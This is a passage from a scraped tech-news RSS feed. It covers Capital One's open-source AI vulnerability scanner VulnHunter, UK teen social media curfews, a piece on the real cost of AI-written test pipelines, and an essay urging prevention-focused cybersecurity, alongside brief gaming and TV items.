compliance and governance and advocate for standardization, automation and collaboration," Nims said in the <a href="https://openssf.org/press-release/2022/08/24/capital-one-joins-open-source-security-foundation/">OpenSSF announcement</a>.</p><p>Behind that public commitment lay a substantial operational apparatus. Capital One's <a href="https://www.capitalone.com/tech/open-source/">Open Source Program Office</a>, now in its third iteration, manages open-source usage, contributions, and community building across the enterprise. The company has released more than 25 open-source projects and made over 2,000 contributions to approximately 135 external open-source projects, according to the company's own disclosures. Those efforts address not just code dependencies but the entire software development lifecycle — DevSecOps tools, infrastructure, and the collaborative environments, both internal and external, that shape how software gets built and shipped.</p><p>Nureen D'Souza, the director who leads Capital One's OSPO, has spoken publicly about the philosophy underpinning this work. At cdCon 2022, D'Souza described a "company-wide culture with security ingrained" that allows developers to focus on innovation rather than maintenance chores, as <a href="https://sdtimes.com/os/how-capital-one-is-strengthening-the-software-supply-chain/">reported by SD Times</a>. The OSPO's charter emphasizes three pillars: standardization of open-source processes, automation of security policies throughout the delivery pipeline, and ecosystem sustainability through upstream contributions to the foundations and projects the company depends on.</p><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> is the most consequential product of that multi-year effort — and the clearest signal yet that Capital One views open-source collaboration not as charity but as a competitive security strategy. The company argues that modern software supply chains are so deeply interconnected that a single vulnerability in a widely used open-source component can cascade across thousands of enterprises simultaneously. Proprietary defenses, no matter how sophisticated, cannot address a problem that is fundamentally communal. By releasing VulnHunter under a permissive license, Capital One invites the global security research community to stress-test, extend, and improve the tool — effectively crowdsourcing its own defense infrastructure while strengthening the broader ecosystem.</p><h2><b>Inside VulnHunter's three-stage AI engine for finding exploitable code</b></h2><p>For engineering leaders evaluating <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a>, the technical architecture is where the tool's ambitions become concrete. The workflow unfolds in three distinct stages.</p><p>In the first stage — attacker-first forward analysis — VulnHunter begins at the points where an external adversary would interact with a system: API endpoints, network message handlers, file upload interfaces. From each entry point, the tool reasons forward through application logic, tracing data flows, transformations, and internal security checkpoints to determine whether an attacker can actually reach a dangerous code path. This approach mirrors how a skilled penetration tester would probe a system, but automates the process at a scale no human team could match.</p><p>The second stage is where VulnHunter departs most sharply from conventional scanners. After identifying a potential vulnerability, the falsification engine runs a structured reasoning workflow designed to disprove its own conclusion. It searches for assumptions that do not hold, logical gaps in the exploit path, and environmental conditions that would prevent an attack from succeeding. Findings that fail this internal challenge are discarded before any developer sees them. Capital One's explicit goal is to shift the developer's burden away from triaging false alarms — a perennial pain point that erodes trust in security tooling and slows development velocity.</p><p>In the third stage, vulnerabilities that survive the falsification engine trigger an evidence-backed remediation workflow. VulnHunter gathers supporting evidence across the codebase, maps the complete surviving exploit path, explains the defect and the specific capabilities an attacker would gain, and generates targeted code changes for engineering review. The output is not a generic advisory but a concrete, context-aware patch proposal.</p><p>Capital One says it validated VulnHunter internally before release, running it across thousands of repositories spanning tens of business areas. The company reports that the tool identified and remediated vulnerabilities with speed and efficiency that far exceeded what its teams previously achieved through manual triage.</p><h2><b>Why AI-powered attacks are forcing banks to rethink traditional cyber defenses</b></h2><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> arrives at a moment when the cybersecurity landscape is shifting beneath the feet of every enterprise. Capital One's announcement frames the urgency in stark terms: advanced AI models have "dramatically lowered the barrier for bad actors to discover and exploit vulnerabilities in software," and the window before sophisticated AI attack capabilities become affordable and accessible to virtually every adversary is shrinking rapidly.</p><p>The company's own AI security researchers have been tracking these trends closely. At <a href="https://www.capitalone.com/tech/software-engineering/secon-2024/">NeurIPS 2024</a> in Vancouver, Capital One's team presented research and curated a list of nearly 100 papers spanning LLM safety, adversarial resilience, jailbreak attacks, and synthetic data generation. The papers they highlighted — including work on multi-agent defense frameworks, automated red-teaming, and guardrail classifiers — paint a picture of an arms race in which offensive and defensive AI capabilities are co-evolving at breakneck speed.</p><p>Several of those research themes map directly onto VulnHunter's architecture. The falsification engine echoes the adversarial defense strategies explored in papers like "<a href="https://pure.psu.edu/en/publications/backdooralign-mitigating-fine-tuning-based-jailbreak-attack-with-/fingerprints/?sortBy=alphabetically">BackdoorAlign</a>," which demonstrated that embedding a structured safety mechanism into a small number of training examples could recover a model's safety alignment without degrading performance. The attacker-first forward analysis reflects the philosophy of "<a href="https://arxiv.org/html/2406.18510v1">WildTeaming</a>," a framework that collects and analyzes real-world jailbreak attempts to build more resilient models. And VulnHunter's emphasis on minimizing false positives parallels the goals of "GuardFormer," a guardrail classifier that outperformed GPT-4 on safety benchmarks while running 14 times faster.</p><p>The thread connecting all of this work is a conviction that traditional, reactive security — monitoring networks, patching known vulnerabilities, responding to incidents after they occur — is no longer sufficient when adversaries can use AI to discover and exploit zero-day vulnerabilities at machine speed. The only durable defense, Capital One argues, is to find and fix the vulnerabilities in your own code before attackers find them first.</p><h2><b>What Capital One's cloud security journey reveals about the entire banking industry</b></h2><p>Capital One's arc from breach victim to open-source security contributor also illuminates a broader reckoning across financial services. When Capital One <a href="https://www.latimes.com/business/story/2019-07-30/capital-one-cloud-safety-hacker-breach">moved aggressively to Amazon Web Services</a> in the mid-2010s, it was a rarity among major banks. Most financial institutions simply did not trust third parties to store their most sensitive data. Capital One's CIO at the time, Rob Alexander, <a href="https://www.forbes.com/sites/peterhigh/2016/12/12/how-capital-one-became-a-leading-digital-bank/">publicly championed the cloud</a> as more secure than the bank's own data centers — a claim that the 2019 breach complicated considerably.</p><p>The <a href="https://cyberscoop.com/capital-one-hack-banking-security/">CyberScoop report</a> from that period captured the tension within the industry. W. Patrick Opet, managing director of cybersecurity at JP Morgan Chase, described a cultural shift in banking from prioritizing traders to prioritizing developers: "Now, it's 'Focus on the developer, turn everything into code, and automate everything.'" Mark Nicholson, Deloitte's cyber leader for the financial industry, noted that the pressure to move quickly was exposing "weaknesses in the development methodology." And the breach itself was a reminder that even as Chase spent $600 million annually on cybersecurity, relatively simple vulnerabilities — like the Apache Struts bug that enabled the Equifax breach — could undercut massive investments in data protection.</p><p>Seven years later, the industry has largely followed Capital One into the cloud, and the security challenges have only intensified. The question is no longer whether to use cloud infrastructure but how to secure the software that runs on it. VulnHunter represents Capital One's answer: rather than relying solely on network-level controls and perimeter defenses, push security directly into the code itself, at the moment it is written. The open-source release also carries implicit competitive pressure. If VulnHunter gains traction among developers and security teams, it could set a new baseline for what enterprise security tooling is expected to do — and force rival banks, fintechs, and cloud providers to match or exceed its capabilities.</p><p>Whether <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> lives up to that ambition will depend on adoption, community engagement, and the tool's real-world performance against the increasingly sophisticated AI-powered attacks it was designed to counter. But the release itself tells a story that extends well beyond any single tool or any single company. In 2019, a misconfigured firewall exposed 100 million records and turned Capital One into a cautionary tale about the cost of moving fast without moving carefully. In 2026, the same institution is open-sourcing the kind of AI-driven defense it wishes it had built sooner — and betting that the best way to protect its own code is to help the entire industry protect theirs.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pixel 11a Gets an Early Specs List, More]]></title>
<description><![CDATA[While we sit around impatiently waiting for Google to give us the Pixel 11 and Pixel 11 Pro, we might as well cure boredom by starting to talk about what comes after. Today, we can do that thanks to a Pixel 11a leak that reveals a codename, some specs, and expected colors. According to the...
Rea...]]></description>
<link>https://tsecurity.de/de/3676822/it-nachrichten/pixel-11a-gets-an-early-specs-list-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676822/it-nachrichten/pixel-11a-gets-an-early-specs-list-more/</guid>
<pubDate>Fri, 17 Jul 2026 20:32:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>While we sit around impatiently waiting for Google to give us the Pixel 11 and Pixel 11 Pro, we might as well cure boredom by starting to talk about what comes after. Today, we can do that thanks to a Pixel 11a leak that reveals a codename, some specs, and expected colors. According to the...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/17/pixel-11a-gets-an-early-specs-list-more/">Pixel 11a Gets an Early Specs List, More</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 4 Release Date, Time, and What to Expect]]></title>
<description><![CDATA[Silo Season 3 Episode 4 will arrive on Apple TV on Friday, July 24, 2026. The next chapter will continue Juliette Nichols’ fight to recover her memories while the Before Times storyline reveals more about the events that led to the creation of the silos.



Season 3 began on July 3 and follows a ...]]></description>
<link>https://tsecurity.de/de/3675994/ios-mac-os/silo-season-3-episode-4-release-date-time-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675994/ios-mac-os/silo-season-3-episode-4-release-date-time-and-what-to-expect/</guid>
<pubDate>Fri, 17 Jul 2026 14:10:37 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 4 will arrive on Apple TV on Friday, July 24, 2026. The next chapter will continue Juliette Nichols’ fight to recover her memories while the Before Times storyline reveals more about the events that led to the creation of the silos.



Season 3 began on July 3 and follows a weekly Friday release schedule. The ten-episode season will run through September 4, 2026.



Silo Season 3 Episode 4 release details




Release date: Friday, July 24, 2026



Release time: 12 a.m. PT and 3 a.m. ET



India release time: Around 12:30 p.m. IST



Streaming platform: Apple TV



Genre: Science fiction, dystopian drama and mystery



Expected duration: Around 45 to 60 minutes



Season episode count: 10 episodes



Season finale: September 4, 2026



Main cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Avi Nash, Alexandria Riley, Shane McRae and Remmie Milner




Ashley Zukerman, Jessica Henwick, Laura Innes, Jessica Brown Findlay, Morven Christie, Reed Birney, Matt Craven and Colin Hanks are among the major additions to the Season 3 cast. Steve Zahn also returns after playing Solo in Season 2.



What happened before Episode 4?



Spoilers ahead for Silo Season 3 Episodes 1 to 3.



Season 3 follows two connected timelines. Inside Silo 18, Juliette has returned after surviving her journey outside, but her damaged memories have left her vulnerable. Camille Sims and Nurse Amy have been using memory-altering drugs as part of a wider attempt to control her and weaken any resistance inside the silo.



Juliette gradually learns that other residents have also lost parts of their memories. Patrick Kennedy tells her about the drugs being used to make people forget, while Juliette continues searching for Lukas Kyle and the truth hidden from her.



Meanwhile, the Before Times storyline follows journalist Helen Drew and pilot Charlotte Keene. Helen investigates secret memory-erasure experiments connected to Dr. Crnkovich, while Charlotte begins recovering memories of a suspicious military operation. Their story appears closely tied to the political crisis and possible attack that eventually forced humanity underground.



What to expect from Silo Season 3 Episode 4



Episode 4 will likely push Juliette closer to discovering who altered her memories and why the Algorithm considers her dangerous. Her growing resistance to the medication also puts Camille, Sims and Nurse Amy under pressure, since they can no longer assume that Juliette will remain confused or obedient.



Patrick’s information about the forgetfulness drugs may help Juliette identify more people who were secretly controlled. Lukas could also return to the main storyline, especially because his knowledge of the Legacy and Salvador Quinn’s message makes him important to understanding the silos.



The Before Times plot should continue exploring Helen’s investigation and Charlotte’s recovered memories. Charlotte’s mission may reveal who planned the disaster, what the strange substance was and whether powerful officials helped create the conditions that led to the silo project.



As both timelines develop, Episode 4 should make the connection between Juliette’s present-day struggle and the original architects of the silo system much clearer.



Silo Season 3 Episode 4 streams on Apple TV on July 24. What do you think Juliette will remember next, and how deeply is Camille involved in the plan to control Silo 18? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Epic Games Store: Ab sofort sind „Echo Generation“ und „Luto“ gratis]]></title>
<description><![CDATA[Der Epic Games Store haut heute wieder zwei kostenlose Spiele für euch raus. Sie lösen die beiden Titel aus der letzten Woche ab sofort ab. Zum einen könnt ihr diese Woche „Echo Generation: Midnight Edition“ abstauben. Hier handelt es sich...Zum Beitrag: Epic Games Store: Ab sofort sind „Echo Gen...]]></description>
<link>https://tsecurity.de/de/3674109/it-nachrichten/epic-games-store-ab-sofort-sind-echo-generation-und-luto-gratis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674109/it-nachrichten/epic-games-store-ab-sofort-sind-echo-generation-und-luto-gratis/</guid>
<pubDate>Thu, 16 Jul 2026 18:34:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Epic Games Store haut heute wieder zwei kostenlose Spiele für euch raus. Sie lösen die beiden Titel aus der letzten Woche ab sofort ab. Zum einen könnt ihr diese Woche „Echo Generation: Midnight Edition“ abstauben. Hier handelt es sich...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/epic-games-store-ab-sofort-sind-echo-generation-und-luto-gratis/">Epic Games Store: Ab sofort sind „Echo Generation“ und „Luto“ gratis</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘What’s the point?’ Teenagers give their verdict on Britain’s social media curfew]]></title>
<description><![CDATA[All the young people the Guardian spoke to disagreed with aspects of the government’s proposed blockSixteen- and 17-year-olds in Britain are to be encouraged to observe a midnight to 6am social media curfew but will be able to opt out by changing their account settings.From next spring, they will...]]></description>
<link>https://tsecurity.de/de/3671792/it-nachrichten/whats-the-point-teenagers-give-their-verdict-on-britains-social-media-curfew/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671792/it-nachrichten/whats-the-point-teenagers-give-their-verdict-on-britains-social-media-curfew/</guid>
<pubDate>Wed, 15 Jul 2026 22:18:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>All the young people the Guardian spoke to disagreed with aspects of the government’s proposed block</p><p>Sixteen- and 17-year-olds in Britain are to be encouraged to observe a <a href="https://www.theguardian.com/technology/2026/jul/14/uk-16-17-year-olds-midnight-social-media-curfew">midnight to 6am social media curfew</a> but will be able to opt out by changing their account settings.</p><p>From next spring, they will be urged to refrain from using certain apps, with the block being switched on by default. But the curfew will not be mandatory and can be overridden.</p> <a href="https://www.theguardian.com/media/2026/jul/15/teenagers-verdic-britain-social-media-curfew-ban-whats-the-point">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK to Introduce Midnight Social Media Curfew for Older Teens]]></title>
<description><![CDATA[The UK plans a midnight-to-6 a.m. social media curfew for 16- and 17-year-olds, with autoplay and personalised feeds switched off by default from spring 2027.
The post UK to Introduce Midnight Social Media Curfew for Older Teens appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3671662/it-nachrichten/uk-to-introduce-midnight-social-media-curfew-for-older-teens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671662/it-nachrichten/uk-to-introduce-midnight-social-media-curfew-for-older-teens/</guid>
<pubDate>Wed, 15 Jul 2026 21:02:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The UK plans a midnight-to-6 a.m. social media curfew for 16- and 17-year-olds, with autoplay and personalised feeds switched off by default from spring 2027.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-teen-social-media-curfew-emea-uk/">UK to Introduce Midnight Social Media Curfew for Older Teens</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What 80% AI-written test pipelines actually cost]]></title>
<description><![CDATA[The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?



After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the typing, not eighty percent o...]]></description>
<link>https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?</p>



<p class="wp-block-paragraph">After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the <em>typing</em>, not eighty percent of the <em>engineering</em>. The remaining twenty was where the work still lived. Budgeting for two percent of leftover effort was the mistake. When the real number was closer to thirty, that gap was the difference between a pipeline that shipped and one that quietly built up a queue of half-trusted features nobody could rely on.</p>



<p class="wp-block-paragraph">This piece is about that gap. As an independent research project on LLM-augmented testing methodology, I built a six-stage agentic pipeline that takes a design in Figma and produces running tests in WebDriverIO, connected end to end over the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. It works. It has been useful. And the parts that broke surprised me, because they were not the parts the hype cycle tells you to worry about.</p>



<h2 class="wp-block-heading">How I wired a six-stage pipeline over one protocol</h2>



<p class="wp-block-paragraph">The pipeline runs six stages in sequence, each owned by a different agent, with every handoff crossing MCP.</p>



<p class="wp-block-paragraph">Six-stage agentic test pipeline: design capture → requirements writer → ticket opener → code generator → test-case writer → automation generator. Each stage carries an MCP handoff and a provenance stamp.</p>



<p class="wp-block-paragraph">The end-to-end trace links a pull request back to a Jira ticket, a requirements section and a Figma frame. Each artifact is stamped with the agent that produced it, the model it used and the inputs it was given.</p>



<p class="wp-block-paragraph">MCP is the boring middle that makes any of this work. The cliché is that MCP is “USB-C for AI”: one open protocol, any tool. Like most analogies, it is about eighty percent right. The part that matters is the eighty: I do not have to write a custom adapter for every system the agent talks to. One MCP server per tool and every agent talks to all of them the same way.</p>



<p class="wp-block-paragraph"><strong>Typed handoffs between agents are my own architecture, layered on top of MCP rather than provided by it.</strong> Each agent writes a typed artifact the next agent reads. Each handoff is logged with provenance. When something went wrong six stages in, I could replay the chain. Without that discipline, a multi-agent pipeline is a debugger’s worst day. You know the test plan is wrong. You cannot tell whether the mistake came from the Figma read, the requirements interpretation or the ticket scaffolding. With it, I could point at exactly which stage went sideways and which inputs it was looking at when it did. The pattern lives in a <a href="https://github.com/SuneetMalhotra/agent-harness">public MIT-licensed reference implementation</a> for any reader who wants to run it.</p>



<p class="wp-block-paragraph"><strong>The sixteen-minute number is the marketing number.</strong> I ran the full chain end to end in about sixteen minutes on a synthetic net-new screen, Figma in, automation suite out. That repeated across my runs; it is not a demo trick. But sixteen minutes is the part of the story most fun to tell and least useful to learn from. It is what gets quoted in the all-hands. The hours that come after, when a human reviews each handoff, are where the work actually lives.</p>



<h2 class="wp-block-heading">What actually broke in production-style runs</h2>



<p class="wp-block-paragraph">The failures that stalled my pipeline were rarely the ones I expected.</p>



<p class="wp-block-paragraph">I expected hallucinated APIs. I got them: the agent confidently called endpoint names that sounded right but did not exist. I expected sparse-spec-in, sparse-spec-out, where a Figma frame with no annotations produced a requirements doc with vague acceptance criteria, every time. I expected locator drift, the common UI-automation failure mode where a renamed component silently breaks an entire test suite. There is solid <a href="https://martinfowler.com/articles/nonDeterminism.html">outside writing on non-determinism in tests</a> covering this whole family of failure modes, and the agent inherited every one.</p>



<p class="wp-block-paragraph">What I did not expect, and what kept the pipeline down longer than any of the above, was the plumbing.</p>



<p class="wp-block-paragraph">The model backend timed out under load. It lost credentials silently and started returning empty strings, which the agent then read as confidence. A duplicate consumer on a shared long-poll API endpoint produced an HTTP 409 conflict that broke delivery without throwing anything visible. One unguarded exception inside one agent aborted a whole shared scheduler run and took the other agents in the registry down with it. The single worst incident cost me three hours to find. An environment variable had silently rotated overnight; every agent in the fleet was returning structurally valid but semantically empty requirements docs; the downstream stages were dutifully generating tests against nothing.</p>



<p class="wp-block-paragraph">None of those are model bugs. They are infrastructure. The agent literature, which is what I went looking through when I started this work, mostly does not talk about them.</p>



<p class="wp-block-paragraph">The fix was not better prompts. It was <a href="https://martinfowler.com/bliki/CircuitBreaker.html">circuit-breaker-style</a> review checkpoints between stages and what I now call <strong>the four-guard discipline</strong>: four small guards I consider non-negotiable on any unattended agentic pipeline. The bulkhead pattern from microservices is the most consequential. An unhandled exception inside one agent can no longer abort the shared run; the offending agent fails fast with a structured error and the others keep going. Paired with that, a pure-data fallback ensures a model timeout produces a deterministic output explicitly marked as degraded mode, rather than an empty string the next stage will misread as confidence. A single-owner lease sits on every shared external endpoint, the cure for the duplicate-consumer incident that ate one of my Sunday afternoons. The cheapest guard was the last to arrive: a one-line synthetic canary every agent has to produce a known correct response to before any real work begins, so a credentials rotation or silent backend failure trips an alert before downstream stages have generated artifacts against garbage.</p>



<p class="wp-block-paragraph">None of these guards is novel. They are textbook stability patterns at a new boundary: the seam between the LLM agent and the rest of the system, which most of the existing agent literature still treats as a solved problem.</p>



<h2 class="wp-block-heading">The 20% you don’t see, and when not to do this</h2>



<p class="wp-block-paragraph">Here is the part the demo videos leave out. Even when the pipeline works, the human time per stage does not go to zero.</p>



<p class="wp-block-paragraph">Human review time per ticket across five pipeline stages: code review 60-180 min, automation review and flaky-fix loop 30-90 min, ticket architecture and sequencing 30-60 min, test data and environment 15-30 min, requirements review 20-30 min. Net: the human still spends 20-30% of the original effort, almost all of it reviewing rather than creating.</p>



<p class="wp-block-paragraph"><strong>Net of all that, the human still spends twenty to thirty percent of the original effort, almost all of it reviewing rather than creating.</strong> The pipeline saves seventy to eighty percent, not ninety-eight. The trap is budgeting for the two percent you do not save.</p>



<p class="wp-block-paragraph">When does this kind of pipeline make sense? In my experience, when the Figma is richly annotated and acceptance criteria are clear up front; when there is review capacity to absorb the work the pipeline shifts onto humans; when the stack is well represented in the training data; and when the feature is net-new rather than a deep edit of legacy code. When does it not? When the design lives on a whiteboard. When the integration touches old code with hidden contracts. When the path is regulated or safety-critical. When there is no senior reviewer who can hold the line. When the work is exploratory and writing the spec is the actual point of the exercise.</p>



<p class="wp-block-paragraph">Teams I have seen succeed with agentic pipelines budget for the rework explicitly, staff the review queue and treat the saved hours as capacity for harder problems rather than headcount they can release. Teams I have seen struggle did the opposite: declared victory at the demo and quietly accumulated a backlog of half-trusted features the next quarter had to clean up.</p>



<p class="wp-block-paragraph">The right unit of measurement is not how much the pipeline generates. It is how much of what it generates a human still has to touch before you would ship it. Call it <strong>the 80/20 rework rule</strong>: measure the rework, not the generation. The teams that get the rework number right are the ones whose AI investments compound. The teams that stop counting at the headline percentage are the ones that own the cleanup six months later.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong><u>Want to join?</u></strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This viral Steam PC horror game is coming exclusive to Xbox on consoles next week, with Game Pass and Play Anywhere]]></title>
<description><![CDATA[Bun Muen, the developer of the upcoming viral indie horror game Shift At Midnight, has announced that, in addition to PC, it's also coming to Xbox consoles, Xbox Game Pass, and Xbox Play Anywhere on July 22, 2026.]]></description>
<link>https://tsecurity.de/de/3670836/windows-tipps/this-viral-steam-pc-horror-game-is-coming-exclusive-to-xbox-on-consoles-next-week-with-game-pass-and-play-anywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670836/windows-tipps/this-viral-steam-pc-horror-game-is-coming-exclusive-to-xbox-on-consoles-next-week-with-game-pass-and-play-anywhere/</guid>
<pubDate>Wed, 15 Jul 2026 15:42:35 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bun Muen, the developer of the upcoming viral indie horror game Shift At Midnight, has announced that, in addition to PC, it's also coming to Xbox consoles, Xbox Game Pass, and Xbox Play Anywhere on July 22, 2026.]]></content:encoded>
</item>
<item>
<title><![CDATA['Ineffective and useless': the UK government is proposing a midnight social media curfew for 16 and 17-year-olds, but there's an easy loophole]]></title>
<description><![CDATA[On top of the complete ban on social media for under-16s, older teens will have restrictions put on their apps.]]></description>
<link>https://tsecurity.de/de/3670491/it-nachrichten/ineffective-and-useless-the-uk-government-is-proposing-a-midnight-social-media-curfew-for-16-and-17-year-olds-but-theres-an-easy-loophole/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670491/it-nachrichten/ineffective-and-useless-the-uk-government-is-proposing-a-midnight-social-media-curfew-for-16-and-17-year-olds-but-theres-an-easy-loophole/</guid>
<pubDate>Wed, 15 Jul 2026 13:32:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[On top of the complete ban on social media for under-16s, older teens will have restrictions put on their apps.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersecurity needs more prevention and less reliance on cure]]></title>
<description><![CDATA[Ask any medical doctor, and they’ll tell you that prevention is better than cure. It’s more cost-effective and it has better outcomes.



The same is true in cybersecurity. But we believe that our industry has veered too far away from this simple concept. We observe that most new tools are detect...]]></description>
<link>https://tsecurity.de/de/3670112/it-security-nachrichten/cybersecurity-needs-more-prevention-and-less-reliance-on-cure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670112/it-security-nachrichten/cybersecurity-needs-more-prevention-and-less-reliance-on-cure/</guid>
<pubDate>Wed, 15 Jul 2026 11:08:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Ask any medical doctor, and they’ll tell you that prevention is better than cure. It’s more cost-effective and it has better outcomes.</p>



<p class="wp-block-paragraph">The same is true in cybersecurity. But we believe that our industry has veered too far away from this simple concept. We observe that most new tools are detection-focused, and we are calling for cyber innovators and venture capital to re-emphasize and invest resources into blocking rather than just discovering problems.</p>



<p class="wp-block-paragraph">The reasons that cybersecurity relies on detection are understandable, and they are based on the history of networked systems. Early systems were fragile. Recovery was slow and downtime was costly. So, the first security controls were designed to restrict unauthorized access. They blocked execution and prevented exploitation, because if an attack succeed – such as a computer virus running successfully – the consequences might have been irreversible.</p>



<p class="wp-block-paragraph">When the internet exploded in the 1990s, prevention solutions multiplied. Vendors developed firewalls and antivirus platforms to stop threats before they started.</p>



<p class="wp-block-paragraph">But attackers adapted, of course, and networks grew more complex. Perimeter controls were no longer good enough on their own. The cyber industry responded with intrusion detection systems and later with <a href="https://www.csoonline.com/article/3829750/4-key-trends-reshaping-the-siem-market.html?utm=hybrid_search">Security Information and Event Management</a>. Detection got a boost from large-scale log aggregation and analytics.</p>



<p class="wp-block-paragraph">This was a great complement to prevention. But it was never meant to replace it.</p>



<h2 class="wp-block-heading">Detection didn’t reduce risk</h2>



<p class="wp-block-paragraph">Security today focuses on visibility, alerting and response. Executives use metrics like mean-time-to-detect and mean-time-to-respond, and compromise is often assumed to be inevitable. But as detection improves, this has not caused a proportional decline in compromise rates.</p>



<p class="wp-block-paragraph">IBM’s <a href="https://www.ibm.com/think/insights/data-matters/cost-of-a-data-breach">Cost of a Data Breach Report</a> consistently shows that faster identification and containment reduce financial impact. But the average global cost of a breach is still millions of dollars – because detection does not prevent the initial compromise.</p>



<p class="wp-block-paragraph">The initial problem continues to come from the usual places: known vulnerabilities, stolen credentials or misconfigurations. In other words, detection reduces impact in the short term, but it does not reduce structural risk.</p>



<h2 class="wp-block-heading">The limits of a detection-first model</h2>



<p class="wp-block-paragraph">When we gather for industry forums like the RSAC Conference, the topics include automation, AI-driven response and operational resilience. These are certainly important, but they have limits. Detection produces false positives and noise. The volume of alerts begins to outpace human capacity to sift through it for the genuine issues. Alert fatigue is real, and talent shortages continue.</p>



<p class="wp-block-paragraph">We observe that the ratio of detection tools versus prevention tools is getting bigger. RSAC Conference runs <a href="https://www.rsaconference.com/rsac-programs/innovation/innovation-sandbox">the largest startup competition</a> in cybersecurity. Over the past three years more than 500 new cybersecurity companies have entered the competition, and we estimate that more than 70 percent of these companies are shipping detection tools, not prevention tools.</p>



<p class="wp-block-paragraph">Detection activates only after a failure has occurred, and unfortunately modern adversaries now operate at machine speed. Vulnerabilities are attacked through automation, and artificial intelligence generates phishing campaigns at a massive scale.</p>



<p class="wp-block-paragraph">As AI lowers barriers to entry and speeds up capabilities, the attack surface will expand even more. Advances in some of the frontier AI models, such as Anthropic’ s Mythos and OpenAI’s GPT-5.5, may unearth previously unknown zero-day risks while chaining together various low-risk vulnerabilities.</p>



<p class="wp-block-paragraph">If that’s not enough, quantum computing raises concerns about <a href="https://www.csoonline.com/article/4180902/reap-now-decipher-later-thats-the-approach-to-cybersecurity-in-the-quantum-age.html">cryptographic resilience</a>. Relying primarily on faster alerting is not the best response to all these threats that will simply multiply faster.</p>



<h2 class="wp-block-heading">Prevention changes the economics</h2>



<p class="wp-block-paragraph">On the other hand, prevention changes defensive economics. To shrink the problem space, a professional can do these things: enable phish-resistant multifactor authentication (MFA), block malicious execution, segment networks and proactively manage vulnerabilities.</p>



<p class="wp-block-paragraph">As exposure decreases, alert volume declines. Detection becomes more effective because noise is reduced.</p>



